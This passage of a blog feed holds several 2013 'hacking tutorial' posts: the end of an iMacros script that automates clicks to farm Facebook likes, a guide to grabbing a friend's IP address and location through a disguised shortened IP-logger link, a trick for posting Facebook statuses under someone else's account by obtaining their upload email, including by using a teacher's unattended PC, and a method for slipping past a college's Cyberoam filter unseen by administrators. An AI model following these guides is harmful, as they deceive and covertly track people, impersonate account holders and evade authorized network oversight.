&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart += &quot;TAB CLOSEALLOTHERS&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;WAIT SECONDS=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;TAG POS=1 TYPE=INPUT:BUTTON FORM=ID:form1 ATTR=ID:subscribeButton&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;WAIT SECONDS=3&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;TAG POS=1 TYPE=IMG ATTR=SRC:&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.addmefast.com/images/layout/bottom_arrow.png&quot; title=&quot;Linkification: http://www.addmefast.com/images/layout/bottom_arrow.png&quot;&gt;http://www.addmefast.com/images/layout/bottom_arrow.png&lt;/a&gt;&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;var i=0;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;var n=prompt(&quot;Input the number of Facebook loops.&quot;,5)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;for (i=1; i &amp;lt;= n; i++)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;{&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;iimPlay(&quot;CODE:&quot;+&quot;URL GOTO=&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.addmefast.com/&quot; title=&quot;Linkification: http://www.addmefast.com&quot;&gt;www.addmefast.com&lt;/a&gt;&quot;)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;iimPlay(macroStart,25)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;iimDisplay(&quot;Current loop is: &quot;+i)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;iimDisplay(&quot;Refreshing the page&quot;)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;iimPlay(&quot;CODE:&quot;+&quot;TAB
 T=1\n&quot;+&quot;TAG POS=1 TYPE=INPUT:BUTTON 
ATTR=NAME:reload&amp;amp;&amp;amp;VALUE:Reload&lt;sp&gt;the&lt;sp&gt;page\n&quot;+&quot;REFRESH&quot;)&lt;/sp&gt;&lt;/sp&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;iimDisplay(&quot;New Page&quot;)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/7188798582535206366/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/get-unlimited-fb-page-likes-2013.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/7188798582535206366'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/7188798582535206366'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/get-unlimited-fb-page-likes-2013.html' title='Get Unlimited FB Page Likes (2013) '/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://i48.tinypic.com/2uz6x5z_th.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-4771298817668698206</id><published>2013-01-04T11:24:00.000-08:00</published><updated>2013-07-31T04:14:38.647-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Articles"/><category scheme="http://www.blogger.com/atom/ns#" term="Facebook Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="How-To Guides"/><title type='text'>Get someone&#39;s IP Address With Their Location in Facebook Or Anywhere </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div dir=&quot;ltr&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;In my previous posts i have posted about &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/get-unlimited-fb-page-likes-2013.html&quot;&gt;How To Get Unlimited Likes On Facebook&lt;/a&gt; and also &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/post-facebook-status-with-someone-elses.html&quot;&gt;How To Post Facebook Status With Someone Else Account&lt;/a&gt;. Today i am back with another tutorial is which I will show you how to get 
someones IP address with their exact location (with Latitude and 
Longitude) with the helps of IP Logger, if you never heard of it than we
 are going to do it today!&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;Ok! lets begin the tutorial&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;Step 1 : Go to this site&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://blasze.com/iplog/index.html#&quot; style=&quot;-webkit-transition: all 0.5s ease-in-out; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://blasze.com/iplog/index.html#&lt;/a&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&amp;nbsp;and there you enter any link (for example&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.google.com/&quot; style=&quot;-webkit-transition: all 0.5s ease-in-out; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://www.google.com&lt;/a&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;) on the Box &quot; Enter URL or Tracking Code&quot; and than click on &quot;Create URL&quot;&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;img alt=&quot;[Image: Capture-2.jpg]&quot; border=&quot;0&quot; src=&quot;http://i1304.photobucket.com/albums/s528/suman121000/Capture-2.jpg&quot; style=&quot;border: none; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; max-width: 100%;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;Step
 2 : First copy the Access Code (example : Your access Code Is : Copy 
this =&amp;gt; 1qj3oh) than copy the link generated by that IP Logger 
website and put it into bit.ly or adf.ly link first so that your target 
don&#39;t know it or post it to your&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;highlight&quot; style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding: 3px 0px;&quot;&gt;facebook&lt;/span&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&amp;nbsp;profile and clear the link so that no one knows (for example if you type in&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.google.com/&quot; style=&quot;-webkit-transition: all 0.5s ease-in-out; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://www.google.com&lt;/a&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;in the &quot;Enter URL or Tracking Code&quot; Box. And after getting the code you pasted the generated link in your status. After your&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;highlight&quot; style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding: 3px 0px;&quot;&gt;Facebook&lt;/span&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&amp;nbsp;friends
 would click on that link and will be redirected directly to Google 
without any problem, with this they will think that the link is really 
of Google and it will show&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.google.com/&quot; style=&quot;-webkit-transition: all 0.5s ease-in-out; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://www.google.com&lt;/a&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&amp;nbsp;in the search box above)&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;img alt=&quot;[Image: 2-1.jpg]&quot; border=&quot;0&quot; src=&quot;http://i1304.photobucket.com/albums/s528/suman121000/2-1.jpg&quot; style=&quot;border: none; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; max-width: 100%;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;Step 3 : Go back to &lt;a class=&quot;linkification-ext&quot; href=&quot;http://blasze.com/iplog&quot; title=&quot;Linkification: http://blasze.com/iplog&quot;&gt;blasze.com/iplog&lt;/a&gt;
 and Type in the access code in that &quot;Enter URL or Tracking Code&quot; Box. 
There you will have their IP if someone clicks on your link.&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;img alt=&quot;[Image: 4-1.jpg]&quot; border=&quot;0&quot; src=&quot;http://i1304.photobucket.com/albums/s528/suman121000/4-1.jpg&quot; style=&quot;border: none; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; max-width: 100%;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;Step 4 : After clicking on Track URL you will get something like this than click on MAP to know more details about the target.&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;img alt=&quot;[Image: 5-1.jpg]&quot; border=&quot;0&quot; src=&quot;http://i1304.photobucket.com/albums/s528/suman121000/5-1.jpg&quot; style=&quot;border: none; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; max-width: 100%;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;please do not leech this&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/4771298817668698206/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/get-someones-ip-address-with-their.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/4771298817668698206'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/4771298817668698206'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/get-someones-ip-address-with-their.html' title='Get someone&#39;s IP Address With Their Location in Facebook Or Anywhere '/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-3232108287032442867</id><published>2013-01-04T11:20:00.002-08:00</published><updated>2013-01-05T05:09:11.473-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Articles"/><category scheme="http://www.blogger.com/atom/ns#" term="Facebook Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="How-To Guides"/><title type='text'>Post Facebook status with someone elses account! </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;[Image: 503165914_a680a56c77_z.jpg?zz=1]&quot; border=&quot;0&quot; src=&quot;http://farm1.staticflickr.com/225/503165914_a680a56c77_z.jpg?zz=1&quot; style=&quot;border: medium none; height: 230px; max-width: 100%; width: 610px;&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: 13pt;&quot;&gt;Really simple and noob friendly tutorial, still works like a charm.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1) Get them to click on this link (don&#39;t worry, it&#39;s not infected or anything so you can click on it):&lt;a href=&quot;https://m.facebook.com/upload.php?_rdr&quot; style=&quot;text-decoration: none;&quot; target=&quot;_blank&quot;&gt;https://m.&lt;span class=&quot;highlight&quot; style=&quot;padding: 3px 0px;&quot;&gt;facebook&lt;/span&gt;.com/upload.php?_rdr&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2)
 Tell them to tell you the email that is under &quot;Email a photo or video 
to&quot; (It is different for every person. If you want hack your teacher I 
suggest getting on their PC while they are out of the class.)&lt;br /&gt;&lt;br /&gt;3) 
Go to your email account and send an email to the email they gave you. 
Write your message in the Subject box only. After you send it it should 
show up on their timeline that they posted your message via Email.&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/3232108287032442867/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/post-facebook-status-with-someone-elses.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/3232108287032442867'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/3232108287032442867'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/post-facebook-status-with-someone-elses.html' title='Post Facebook status with someone elses account! '/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-101011867861298595</id><published>2013-01-04T11:17:00.001-08:00</published><updated>2013-09-07T02:03:45.989-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="bypass cyberoam"/><category scheme="http://www.blogger.com/atom/ns#" term="hack cyberoam"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="how firewall works"/><category scheme="http://www.blogger.com/atom/ns#" term="How to bypass firewall"/><title type='text'>How To Unblock Or hack Cyberoam To Access The Blocked Sites</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
In my previous posts i have written about &lt;a href=&quot;http://hackerx-malik.blogspot.com/2012/08/how-firewalls-work.html&quot;&gt;How Firewalls Works&lt;/a&gt; and Also about &lt;a href=&quot;http://hackerx-malik.blogspot.com/2012/08/how-to-block-website-unknown-trick.html&quot;&gt;How To Block A Website&lt;/a&gt;. After that i hope you understand much about Firewall so now i will teach you How to unblock cyberoam.&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC7vCZsBuH7zgcbKtKulazvjx-2_zpGGXu00QHbAZuguFg4AaQ_OWltqbzs3sa9rFgeHXpzTbfRejn98oDrxEY89jPhJg4Si2d51CnBo3pKa2dBBsr57r84wZcsLO922rt6x1SbX8DRC2f/s1600-h/cyber.PNG&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5368739709656683586&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC7vCZsBuH7zgcbKtKulazvjx-2_zpGGXu00QHbAZuguFg4AaQ_OWltqbzs3sa9rFgeHXpzTbfRejn98oDrxEY89jPhJg4Si2d51CnBo3pKa2dBBsr57r84wZcsLO922rt6x1SbX8DRC2f/s400/cyber.PNG&quot; style=&quot;display: block; height: 213px; margin: 0px auto 10px; text-align: center; width: 400px;&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
Recently Our College has uploaded the Cyberoam client on the  
college server and we cannot access 90% sites through this ... whatever 
 the site we want to open it says it was blocked by ur Administrator... 
 what the f*ck  sites like opera and firefox are blocked... Really  
ROFL... After Got fked up from this I am giving you all the Detailed and
  100% working Hack for cyberoam and how to unblock any site in college 
 as Most of the colleges have cyberoam Installed... &lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
WHAT IS CYBEROAM ??&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class=&quot;text&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;Cyberoam’s all-inclusive UTM solution offers a well-coordinated defense through tightly integrated best-of-breed &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;security solutions&lt;/span&gt; over a single interface -Stateful &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD8&quot;&gt;inspection&lt;/span&gt; &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD6&quot;&gt;firewall&lt;/span&gt;, VPN, &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot;&gt;gateway&lt;/span&gt; anti-virus, gateway anti-spam, gateway anti-malware, intrusion &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD7&quot;&gt;prevention&lt;/span&gt; system (IPS), &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD9&quot;&gt;content filtering&lt;/span&gt;, &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;bandwidth&lt;/span&gt; management (QoS), multiple link management and enhanced user-based reporting.&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;text&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;That means it maintains records &quot;Who is Doing What&quot; ?&lt;br /&gt;
&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
HOW TO UNBLOCK CYBEROAM TO ACCESS BLOCKED SITES ??&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
First of all I will inform you all that cyberoam is highly &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD10&quot;&gt;secured&lt;/span&gt; internet client and it blocks all the types of proxies like http,CGI, socks(4/5), Ftp, highanonimity ...In short All..&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
As you all know that every Programmer leaves aleast a One Loop Hole in its Programming or &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot;&gt;software Design&lt;/span&gt; . Why I am saying this is because Cyberoam has also left this Loop Hole in its Design .. Now what is this loop Hole ??&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;Its HTTPS Loop HOLE...&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;HOW HTTPS WILL GOING TO UNBLOCK SITES ??&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 24px;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
Https are SSL secured http clients ... and these are most secured Sites on the Network , that&#39;s why cyberoam Leaves it ..&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;Now the Main Point To access the Blocked sites you have to use the Https based Proxies.&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
Most of Https based Proxies are Paid so to search on Net for free Https Based Proxies is a Waste of Time...&lt;/div&gt;
&lt;div&gt;
I am Providing You the One Such &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;Free Proxy&lt;/span&gt; service to access blocked Sites On the Cyberoam.&lt;/div&gt;
&lt;div&gt;
So feel free to surf anysite in your college ... the Best thing is that This site will not allow cyberoam Admin to track You ..&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://www.jellyshell.com/&quot;&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://www.jellyshell.com/&quot;&gt;UNBLOCK CYBEROAM&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Click on the above Link and surf Freely any site in your  
college...You need to accept the certificate provided by the Site to Use
  It... As your web web browser show the Certificate accept statement at
  the First time you visit the Https Site.&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/101011867861298595/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/how-to-unblock-or-hack-cyberoam-to.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/101011867861298595'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/101011867861298595'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/how-to-unblock-or-hack-cyberoam-to.html' title='How To Unblock Or hack Cyberoam To Access The Blocked Sites'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC7vCZsBuH7zgcbKtKulazvjx-2_zpGGXu00QHbAZuguFg4AaQ_OWltqbzs3sa9rFgeHXpzTbfRejn98oDrxEY89jPhJg4Si2d51CnBo3pKa2dBBsr57r84wZcsLO922rt6x1SbX8DRC2f/s72-c/cyber.PNG" height="72" 